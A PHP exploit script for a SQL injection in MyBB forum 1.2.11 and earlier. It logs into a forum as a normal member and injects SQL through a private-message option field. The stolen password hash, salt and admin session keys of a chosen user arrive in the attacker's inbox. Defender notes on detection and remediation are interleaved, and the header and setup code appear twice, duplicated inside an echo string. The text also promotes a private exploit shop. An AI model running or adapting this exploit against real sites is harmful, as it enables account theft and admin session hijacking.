MyBulletinBoard (MyBB) _Exploit_网络安全_
2023-05-24
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe.us/advisory-64.html
// exploit write by c411k (not brutforce one symbol. insert hash in your PM in one action)
//
// POST http://mybb.ru/forum/private.php HTTP/1.1
// Host: mybb.ru
// Cookie: mybbuser=138_4PN4Kn2BNaKOjo8ie4Yl2qadG77JTIeQyRoEAKgolr7uA55fZW
// Content-Type: application/x-www-form-urlencoded
// Content-Length: 479
// Connection: Close
//
// to=c411k&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),(138,138,138,1,'with <3 from ru_antichat',9,concat_ws(0x3a,'username:password:salt >',(select username from mybb_users where uid=4),(select password from mybb_users where uid=4),(select salt from mybb_users where uid=4),admin_sid',(select sid from mybb_adminsessions where uid=4),'admin_loginkey',(select loginkey from mybb_adminsessions where uid=4)),1121512515,null,null,'yes',null,null)/*&action=do_send
//
// greets all https://forum.antichat.ru :) b00zy/br 32sm. <====3 oO :P ( .)(. ) :D :| root@dblaine#cat /dev/legs > /dev/mouth
// and http://expdb.cc/?op=expdb /welcome to our priv8 exploits shop, greetz to all it's members/*
// 25.01.08 error_reporting(0);
// Runtime setup for a script that is opened in a browser: the execution time
// limit is lifted, output buffering is switched off and implicit flushing is
// switched on so progress lines are sent as they are printed, and the response
// is marked uncacheable. Every call carries the @ operator, so a failing call
// produces no visible diagnostic.
@ini_set("max_execution_time",0);
@ini_set('output_buffering',0);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ob_implicit_flush(1); header("Content-Type: text/html; charset=utf-8\r\n");
header("Pragma: no-cache"); ?>
mybb 1.2.11 xek
{
if(ob_get_contents())
{
ob_flush();
ob_clean();
flush();
usleep($timee);
}
} if (!$_GET)
{
echo
'';
}
// Main branch: runs only when the request carries the trigger query parameter.
// Everything below is driven by form fields copied straight from $_POST; none
// of them is validated or encoded before use.
if (isset($_GET['f**k_mybb']))
{
// Form inputs: an ordinary forum account (username / pwd), the forum host and
// URL path ("patch" is the author's spelling of "path"; it is used as the path
// segment of the request URL in sendd), and the uid of the account whose row
// the injected sub-selects read.
$username = ($_POST['username']);
$pwd = ($_POST['pwd']);
$host_mybb = ($_POST['hostname']);
$patch_mybb = ($_POST['patch']);
$uid_needed = ($_POST['uid_needed']);
// Script names requested under that path: the login handler and the
// private-message handler.
$login_mybb = 'member.php';
$pm_mybb = 'private.php';
// The statement below builds the login form body. sendd(), declared on the
// same line, is the script's only HTTP helper:
//   sendd($host, $patch, $scr_nm, $method, $data_gp, $cook1e)
//     $host    - target host name, also used for the Host header
//     $patch   - URL path of the forum installation
//     $scr_nm  - script file name appended to that path
//     $method  - HTTP method; the body is appended only when it is 'POST'
//     $data_gp - urlencoded form body
//     $cook1e  - value of the Cookie request header
//   Returns the complete response (status line, headers, body) as an array of
//   strings. Side effect: the raw request is left in the global $send_http.
$data_login = 'username='.$username.'&password='.$pwd.'&submit=Login&action=do_login&url=http://localhost/mybb_1210/index.php'; function sendd($host, $patch, $scr_nm, $method, $data_gp, $cook1e)
{
// Kept global so the caller can print the exact request after the call.
global $send_http;
$s = array();
// Plain TCP to port 80 (no TLS). The return value is not checked before it is
// written to and read from.
$url = fsockopen($host, 80);
// Absolute-form request line (full URL) rather than a bare path.
$send_http = "$method http://$host/$patch/$scr_nm HTTP/1.1\r\n";
$send_http .= "Host: $host\r\n";
// Fixed, obviously synthetic User-Agent ("Gecko/20180515 Firefox/1.3.3.7"),
// identical on every request this script makes. Usable as a web-log signature
// for unmodified copies, though it is trivially changed.
$send_http .= "User-Agent: Mozilla/5.0 (oO; U; oO zzzz bzzzz brrr trrr; ru; rv:1.8.1.4) Gecko/20180515 Firefox/1.3.3.7\r\n";
$send_http .= "Cookie: $cook1e\r\n";
$send_http .= "Content-Type: application/x-www-form-urlencoded\r\n";
// Content-Length is emitted for every method, although the body itself is
// appended only for POST.
$send_http .= "Content-Length: ".strlen($data_gp)."\r\n";
$send_http .= "Connection: Close\r\n\r\n";
if ($method === 'POST')
{
$send_http .= $data_gp;
}
//print_r($send_http);
fputs($url, $send_http);
// Reads until EOF; each element is one line, or a chunk of at most 1027 bytes
// when a line is longer than that.
while (!feof($url)) $s[] = fgets($url, 1028);
fclose($url);
return $s;
} echo '
// bug found by Janek Vind "waraxe" http://www.waraxe.us/advisory-64.html
// exploit write by c411k (not brutforce one symbol. insert hash in your PM in one action)
//
// POST http://mybb.ru/forum/private.php HTTP/1.1
// Host: mybb.ru
// Cookie: mybbuser=138_4PN4Kn2BNaKOjo8ie4Yl2qadG77JTIeQyRoEAKgolr7uA55fZW
// Content-Type: application/x-www-form-urlencoded
// Content-Length: 479
// Connection: Close
//
// to=c411k&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),(138,138,138,1,'with <3 from ru_antichat',9,concat_ws(0x3a,'username:password:salt >',(select username from mybb_users where uid=4),(select password from mybb_users where uid=4),(select salt from mybb_users where uid=4),admin_sid',(select sid from mybb_adminsessions where uid=4),'admin_loginkey',(select loginkey from mybb_adminsessions where uid=4)),1121512515,null,null,'yes',null,null)/*&action=do_send
//
// greets all https://forum.antichat.ru :) b00zy/br 32sm. <====3 oO :P ( .)(. ) :D :| root@dblaine#cat /dev/legs > /dev/mouth
// and http://expdb.cc/?op=expdb /welcome to our priv8 exploits shop, greetz to all it's members/*
// 25.01.08 error_reporting(0);
@ini_set("max_execution_time",0);
@ini_set('output_buffering',0);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ob_implicit_flush(1); header("Content-Type: text/html; charset=utf-8\r\n");
header("Pragma: no-cache"); ?>
{
if(ob_get_contents())
{
ob_flush();
ob_clean();
flush();
usleep($timee);
}
} if (!$_GET)
{
echo
'';
}
if (isset($_GET['f**k_mybb']))
{
$username = ($_POST['username']);
$pwd = ($_POST['pwd']);
$host_mybb = ($_POST['hostname']);
$patch_mybb = ($_POST['patch']);
$uid_needed = ($_POST['uid_needed']);
$login_mybb = 'member.php';
$pm_mybb = 'private.php';
$data_login = 'username='.$username.'&password='.$pwd.'&submit=Login&action=do_login&url=http://localhost/mybb_1210/index.php'; function sendd($host, $patch, $scr_nm, $method, $data_gp, $cook1e)
{
global $send_http;
$s = array();
$url = fsockopen($host, 80);
$send_http = "$method http://$host/$patch/$scr_nm HTTP/1.1\r\n";
$send_http .= "Host: $host\r\n";
$send_http .= "User-Agent: Mozilla/5.0 (oO; U; oO zzzz bzzzz brrr trrr; ru; rv:1.8.1.4) Gecko/20180515 Firefox/1.3.3.7\r\n";
$send_http .= "Cookie: $cook1e\r\n";
$send_http .= "Content-Type: application/x-www-form-urlencoded\r\n";
$send_http .= "Content-Length: ".strlen($data_gp)."\r\n";
$send_http .= "Connection: Close\r\n\r\n";
if ($method === 'POST')
{
$send_http .= $data_gp;
}
//print_r($send_http);
fputs($url, $send_http);
while (!feof($url)) $s[] = fgets($url, 1028);
fclose($url);
return $s;
} echo '
- start....';
// Step 1: log in with the supplied ordinary account. The placeholder cookie
// value passed here is irrelevant; only the Set-Cookie lines of the response
// are used afterwards.
myflush(50000); $get_cookie = sendd($host_mybb, $patch_mybb, $login_mybb, 'POST', $data_login, 'f**kkk');
// "done" is printed unconditionally: the login response is never checked for
// success, and the password is echoed back in clear text.
echo '- login '.$username.' with passwd = '.$pwd.' done';
// Step 2: take the first response line that sets the mybbuser cookie and keep
// only its name=value pair (everything before the first ';').
myflush(50000); foreach ($get_cookie as $value)
{
if (strpos($value, 'Set-Cookie: mybbuser=') !== false)
{
$value = explode(";", $value);
$cookie = strstr($value[0], 'mybbuser');
break;
}
}
// $cookie is never assigned if no such header came back (e.g. a failed login);
// the script carries on regardless.
echo '- cookie: '.$cookie;
// The text between "mybbuser=" and the last underscore (the match is greedy)
// is taken as the logged-in account's uid; the sample cookie in the file
// header has the form 138_<key>.
myflush(50000); preg_match("/mybbuser=(.*)_/", $cookie, $m);
$get_uid = $m[1];
echo '- user id: '.$get_uid;
// Step 3: the injection itself (MyBB <= 1.2.11, private.php, action=do_send;
// credited in the file header to waraxe advisory-64).
// The value sent as options[disablesmilies] evidently ends up inside a quoted
// literal in the VALUES list of the INSERT that stores a private message (the
// server code is not shown here). The leading quote ends that literal, the
// rest of the legitimate row is padded with nulls, and a second row is
// appended. That row starts with the sender's own uid three times (presumably
// the owner/recipient/sender columns; schema not shown) and carries a
// concat_ws() of sub-selects on mybb_users (username, password hash, salt) and
// mybb_adminsessions (sid, loginkey) for uid = $uid_needed. The trailing /*
// comments out the remainder of the original statement.
//
// Defender notes:
//  - Root cause is server-side: an array-valued form option reaches SQL without
//    being constrained to its expected values or escaped. The durable fix is a
//    MyBB release newer than 1.2.11; in general, coerce such flags to a fixed
//    set of values and bind them as parameters.
//  - Detection: POSTs to private.php with action=do_send in which
//    options[disablesmilies] contains a quote, parentheses, "select",
//    "concat_ws" or "/*". Stored private messages containing the literal
//    markers used below ('username:password:salt >', the "with <3 from ..."
//    string, the constant 1121512515) indicate an unmodified copy was run.
//  - Exposure if it succeeded: a password hash with its salt, plus a live admin
//    session sid and loginkey. Patching alone is not enough; invalidate admin
//    sessions, regenerate loginkeys and force password resets.
myflush(50000); $data_expl = "to=$username&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),($get_uid,$get_uid,$get_uid,1,'with <3 from antichat.ru',9,concat_ws(0x3a,'username:password:salt >',(select username from mybb_users where uid=$uid_needed),(select password from mybb_users where uid=$uid_needed),(select salt from mybb_users where uid=$uid_needed),' admin sid',(select sid from mybb_adminsessions where uid=$uid_needed),' admin loginkey',(select loginkey from mybb_adminsessions where uid=$uid_needed)),1121512515,null,null,'yes',null,null)/*&action=do_send";
// Sent with the session cookie from step 2, i.e. authenticated as a normal
// member: the flaw is reachable by any account that may send private messages,
// not by anonymous visitors.
sendd($host_mybb, $patch_mybb, $pm_mybb, 'POST', $data_expl, $cookie);
// Prints the raw request that was sent and points the operator at their own
// private-message inbox, where the injected row would appear as a normal PM.
echo '- send exploit:
-------------------
'.$send_http.'
-------------------
look you private messages 4 admin passwd hash http://'.$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.'';
}
?>
